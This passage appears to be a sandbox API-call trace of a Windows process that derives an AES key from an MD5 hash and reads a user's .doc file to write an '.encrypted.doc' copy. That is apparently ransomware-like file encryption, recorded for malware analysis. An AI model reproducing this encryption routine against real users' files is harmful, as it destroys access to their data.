ftLastWriteTime.dwHighDateTime=0x1d5c47f, nFileSizeHigh=0x0, nFileSizeLow=0x2926, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="sm D80ZGiF.doc", cAlternateFileName="SMD80Z~1.DOC")) returned 0x7c2240 [0035.915] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0035.915] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.915] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.915] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.915] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.915] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0035.915] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.915] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0035.915] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.916] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.916] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0035.916] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.916] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.916] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.916] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.916] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.916] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0035.916] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.916] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0035.917] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.917] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.917] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0035.917] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.917] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.917] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.917] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.917] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.917] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.917] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.917] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.917] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.917] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.917] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.918] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.918] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0035.918] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.918] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.918] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.918] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.918] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.918] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.918] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.918] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.918] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.918] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.918] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.918] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.919] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.919] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.919] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.919] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.919] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.919] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.919] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.919] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0035.919] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.919] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.919] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.919] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.919] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0035.919] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.919] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.919] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.919] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.919] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.919] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0035.919] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.919] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.920] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.920] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.920] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.920] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.920] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.920] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.920] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0035.920] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.920] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.920] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.920] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.920] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.920] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.920] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0035.920] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.920] CryptDestroyHash (hHash=0x7c2100) returned 1 [0035.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0035.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0035.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0035.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0035.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0035.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0035.920] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0035.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0035.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0035.921] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0035.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0035.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0035.921] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.921] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.921] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0035.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0035.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0035.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0035.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.921] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\sm d80zgif.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.921] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.921] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0035.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0035.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0035.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0035.921] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0035.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0035.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0035.922] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.922] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0035.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0035.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0035.922] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.encrypted.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\sm d80zgif.encrypted.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0035.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0035.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0035.922] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0035.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0035.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0035.923] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.923] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0035.923] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0035.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0035.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.923] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0035.923] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x2926, lpOverlapped=0x0) returned 1 [0035.924] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0035.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0035.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x2926) returned 0x955018 [0035.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0035.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0035.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0035.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0035.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0035.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x2926) returned 0x957948 [0035.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0035.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.925] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0035.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x2926) returned 0x955018 [0035.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0035.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0035.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0035.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.925] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0035.925] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0035.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.925] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0035.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 